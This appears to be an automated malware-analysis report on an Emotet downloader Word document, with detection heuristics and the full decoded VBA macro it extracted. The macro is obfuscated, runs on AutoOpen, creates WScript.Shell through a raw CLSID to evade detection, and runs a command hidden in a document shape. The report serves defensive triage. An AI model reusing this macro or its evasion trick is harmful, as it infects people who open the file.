Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File), T1059.001 (PowerShell)
The sample contains VBA macros, including an AutoOpen macro, and triggers critical heuristics for dangerous COM class instantiation (WScript.Shell) and PowerShell references. ClamAV detection explicitly names this as Emotet. The VBA script likely downloads and executes a second-stage payload, a common Emotet behavior.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6826436-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826436-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched line in script (shown with one line of context on each side): `Next Set SaPNcWTvi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + EMLkPo + EuLjb + QWjSrHR + onKNzEQnk) On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script (shown with one line of context on each side): `Next Set SaPNcWTvi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + EMLkPo + EuLjb + QWjSrHR + onKNzEQnk) On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script (shown with one line of context on each side): `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9149 bytes |

macros.bas details:

- SHA-256: 494358406b44d4a6fc668ce5d7d163560309e9a89eb9a2586eea8972eb14f291
- Detection, ClamAV: No threats found
- Obfuscation or payload: likely. 200 of 295 identifiers look randomly generated (e.g. 'wMKHcAzziDiJoN'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "GHlvGiLjQZRfJI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case CAikiN
Case 200350173
alzUDluK = CBool(LftlYkd)
UllYsjaI = 163477573
Case 8489310
IjVKbcMGQ = Atn(ttJCFajh)
dPBCJcs = Atn(106123896 * CLng(219515996))
End Select
For Each YMikC In qpVSI
dNBbsc = nFqbwXc * CDate(dLiiM * BrUPIHAP) * OOTRmnBi / Sin(QuuzhlhM) / uNinkwh + 184228117 - 143717444 + Chr(218395260) + (jUVYUc * dGqTbc)
Next
On Error Resume Next
Select Case HFwVt
Case 101068852
DLcqzfQ = CBool(mKsok)
WsMIJ = 338699924
Case 113710492
owjDY = Atn(wqwljEI)
BzpjFKOZ = Atn(88785698 * CLng(227771095))
End Select
For Each wkNlMjPEw In iHtGmHv
HHjwjr = TZtHqP * CDate(AIctjFlB * zKQXpv) * TCTNGbP / Sin(BWVsJWzIH) / GlitXpZFq + 217676747 - 255488994 + Chr(127595927) + (ZYzaEX * iZtdr)
Next
Set truBBIdj = Shapes("wMKHcAzziDiJoN")
On Error Resume Next
Select Case PCRzY
Case 134553816
HnnCbXM = CBool(GOvTq)
krhjrzSHi = 329734716
Case 157868736
IaowBb = Atn(XGqBI)
mziSQCoa = Atn(61155885 * CLng(200139268))
End Select
For Each jNjVF In FpiHOlRJN
OTmuqZ = FzjpRvjsz * CDate(iMnvjSGlL * hYORIDi) * HWjTKTb / Sin(VJnuuPO) / mwZYiBfJ + 203777484 - 313560371 + Chr(85070614) + (lSjOMKlc * KCUUOw)
Next
On Error Resume Next
Select Case jwoXzCS
Case 160387474
iBIPa = CBool(LWYNI)
fVwAqFGr = 198255916
Case 248380389
OmdNG = Atn(NmCMw)
ddWvlCDG = Atn(215064564 * CLng(76585925))
End Select
For Each EdpWHwLh In ssudzoF
KbGcjkV = TKVoafd * CDate(CZkQi * qriTr) * iswwzhwF / Sin(HVsTz) / lpsBNOsb + 158931478 - 25449682 + Chr(269434100) + (ElPzPskoa * ZrsiXz)
Next
On Error Resume Next
Select Case VOCMHj
Case 33813296
rczbCLz = CBool(ulZqowfHG)
FblziG = 130726617
Case 66350899
XSQOXVkjq = Atn(OWONpKjOb)
ZjuGrii = Atn(276290620 * CLng(298813341))
End Select
For Each sHsRcYdXB In DMpRstr
vnzssk = nXKWtru * CDate(vzGdzlRjM * FVMudN) * mQuFvAOHv / Sin(ASAHdJWt) / lQtciG + 258777577 - 206472284 + Chr(256715640) + (ItuzYG * AkAwsVB)
Next
On Error Resume Next
Select Case lsbQcOBJ
Case 300286864
FZDEHmin = CBool(JBGfv)
rUCWzm = 256552750
Case 111763715
zAvcRci = Atn(wtUlw)
kznCLc = Atn(229898726 * CLng(206662340))
End Select
For Each fAluwm In vSIfFHrFV
fwHmais = SZMjb * CDate(pUnPcjif * EzCdTI) * FhhnzmX / Sin(EVsojNi) / rTplTb + 194182916 - 270079369 + Chr(279754607) + (fDoYAZwoT * CoqDwMK)
Next
On Error Resume Next
Select Case POwJmjjCq
Case 23561588
lzrNU = CBool(illJw)
vlFjQdG = 260448566
Case 187645281
IkUMDmjQG = Atn(nnuWUish)
bZoQj = Atn(21955386 * CLng(155007173))
End Select
For Each zTYkQinp In tHAsC
CKrHqjM = kZlAYUUk * CDate(jGjzh * XJHhN) * ljJZElGr / Sin(jznhoKidO) / mIwUlS + 154802463 - 134220942 + Chr(36948453) + (wjBzBz * cbUiOtMzI)
Next
WLnTujPc = "" + zEWlLJdW + DswwGUm + truBBIdj.TextFrame.TextRange.Text + TpruDJ + mpHQWBw
On Error Resume Next
Select Case rrQNbEKE
Case 305056879
btTrtQp = CBool(LIwqwEqbz)
BUVbwJIHP = 166477135
Case 50815001
STTidi = Atn(TsZXqack)
uLXzH = Atn(107722713 * CLng(19349856))
End Select
For Each HzzJjlB In jwpcXN
IvdBcwi = UYHMD * CDate(HHCQt * ikWkHYH) * dmIdj / Sin(OEdOaccz) / kbYzNbp + 258253576 - 82005530 + Chr(193161781) + (wXYsuDoX * hQdfSnD)
Next
On Error Resume Next
Select Case zXsTSdt
Case 42614205
RKpvUH = CBool(zYoFYat)
HutNq = 84508137
Case 336164859
GBcBSfE = Atn(vJDUaWhZ)
HiwojFWd = Atn(292309995 * CLng(79490976))
End Select
For Each kfQzSni In sGJUUFJOX
akMTdii = iavGX * CDate(TjwPtDC * onhdwOci) * qwFRbMQ / Sin(iVQFI) / ljiAnHtVT + 145843106 - 264389350 + Chr(319396403) + (lAjPazC * HSIsU)
Next
On Error Resume Next
Select Case ZkcjiNj
Case 17259095
Mcwaaw = CBool(cpFUBz)
uzWOF = 270253963
Case 317696796
DDhjIBh = Atn(unWVwHnjp)
YddwRWca = Atn(224384056 * CLng(239743549))
End Select
For Each zbNOh In stunQvu
jibLmL = YSQSBGmK * CDate(iTzmv * JHQiun) * zIhimkrAO / Sin(YTaIwvjTG) / qEwwHPUV + 130944220 - 313356750 + Chr(25980118) + (BdTIkS * BSDUXY)
Next
Set SaPNcWTvi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + EMLkPo + EuLjb + QWjSrHR + onKNzEQnk)
On Error Resume Next
Select Case pTJWJDu
Case 130061425
PbCzzAHHu = CBool(PnJlbhDjp)
vGGHpFZ = 295027199
Case 87210130
kzpKu = Atn(fbzlSDT)
wnfhi = Atn(264510804 * CLng(43771083))
End Select
For Each FsBJUv In rbPur
RzzrB = bjEIs * CDate(wJCarKZw * szIkFj) * HKDIbz / Sin(pjqjlfjB) / JWWmFRjE + 140665921 - 304701070 + Chr(285387949) + (zqGwTHb * EjLwdMtAd)
Next
On Error Resume Next
Select Case knrDp
Case 292977149
dkVFpIC = CBool(EbCBzVopI)
KLcZLri = 215309991
Case 244714176
dQSThJmwm = Atn(AjRVBYDZn)
vzicfhwE = Atn(166204397 * CLng(200008541))
End Select
For Each IWHVnIj In qirDSa
tHYnoFt = wjiqnzNiX * CDate(PsMJz * PTEzDD) * QBEnojlqV / Sin(XJpFSw) / cAUvCiN + 239272776 - 51710128 + Chr(69234694) + (UAwwulR * iMYBlRud)
Next
On Error Resume Next
Select Case QctLmEVrJ
Case 287645940
XwZKOlG = CBool(SJbQDAV)
NTSjU = 257720664
Case 159450716
qjCRi = Atn(WwMUL)
iuIwrhIn = Atn(272092150 * CLng(78596568))
End Select
For Each KRzHXqIKk In WUijolI
dDjpoWTK = rmikOiq * CDate(AjCwHDJbI * ZaODvz) * MIHVccoMV / Sin(YFnIqr) / oCGoVzZNf + 72780441 - 297536805 + Chr(238043942) + (oqilB * jVXHOml)
Next
On Error Resume Next
Select Case TRisJl
Case 156721110
kGpYs = CBool(HOKsE)
kizucm = 229373156
Case 330954107
hszNQUzcu = Atn(BEAdS)
ilLQBj = Atn(110292794 * CLng(120405499))
End Select
For Each jkTnPWCZ In COqLc
ImQrCOjF = dwAXhwB * CDate(hihjfoi * wfAaEbS) * XIOQY / Sin(TzfpKQ) / isBBmIh + 304838634 - 26401291 + Chr(186255302) + (lOEjjfaBj * AYklCRKiE)
Next
On Error Resume Next
Select Case rGZSE
Case 187529650
ddpThIh = CBool(MDTuwGE)
nftEZoD = 325605272
Case 177366906
JrkztuJwu = Atn(ucDzbHi)
NzWznfl = Atn(256849972 * CLng(74300571))
End Select
For Each woZrtjz In qPJZlwLbj
bwdRFf = daJEFMGj * CDate(BGCDjUwl * TOnLYo) * zaLOti / Sin(uHPIplkD) / qAwFZ + 191256882 - 185361611 + Chr(47798252) + (rzlQwRCVt * lvUrX)
Next
Const nnzBtTApZRD = 0
On Error Resume Next
Select Case JwjsB
Case 33473383
fdcCAt = CBool(QlHvuHjSo)
jHMEcaN = 268094437
Case 300080494
NTtaQDR = Atn(fSwbo)
fdbDsFYqK = Atn(59047053 * CLng(77208763))
End Select
For Each sHCCONGUd In rjirqbmVd
TPYzz = voAWJ * CDate(OWKJGcDj * UThluYB) * zEofGZ / Sin(iCDERST) / oGSIj + 212963522 - 135590833 + Chr(66556945) + (ujzvrO * luZDS)
Next
On Error Resume Next
Select Case ZqbYzTk
Case 150733697
kQajtKlWa = CBool(SFVdLIE)
qbwtE = 148175404
Case 325170744
BoRVhZnBU = Atn(LljWN)
XGKPEN = Atn(101045271 * CLng(100221268))
End Select
For Each LuvAqLDjv In wFEvs
TILzTY = OlWwMh * CDate(oYCcWisAi * HBoOQHSK) * zkEDRZ / Sin(bhOTNrBB) / XDbZNZ + 124531626 - 200440683 + Chr(149762382) + (RkFziDnuk * kVkDj)
Next
On Error Resume Next
Select Case WEQtVtZ
Case 240856317
ZELnVSrY = CBool(EwZEw)
WviWnYdhh = 257594296
Case 145892682
SjMilw = Atn(RnBiX)
bhqYrw = Atn(120466578 * CLng(37472293))
End Select
For Each XZOCzKv In dAzwYrt
NcBhFUN = CLqnI * CDate(qDNvJmUiz * VQXhXUCqw) * iURYR / Sin(MGzlT) / OnKvk + 194511522 - 224716893 + Chr(48174023) + (icILp * fkiIAqFLW)
Next
SaPNcWTvi.Run# WLnTujPc, nnzBtTApZRD
On Error Resume Next
Select Case bCuCUjvM
Case 277554270
TutKlGlB = CBool(DLfJDWEFz)
OJcIcmd = 165104515
Case 295670195
iCzOp = Atn(IzAGECIEd)
wtqfPdv = Atn(264955666 * CLng(182187039))
End Select
For Each qmRYHjs In IBNQTKOHE
SMBYiGpji = qEHJmN * CDate(VjcwX * MvcHf) * fRHYCVP / Sin(SHKjYwf) / EtEdG + 54726877 - 292026154 + Chr(176318176) + (uvCocBw * JCvij)
Next
End Sub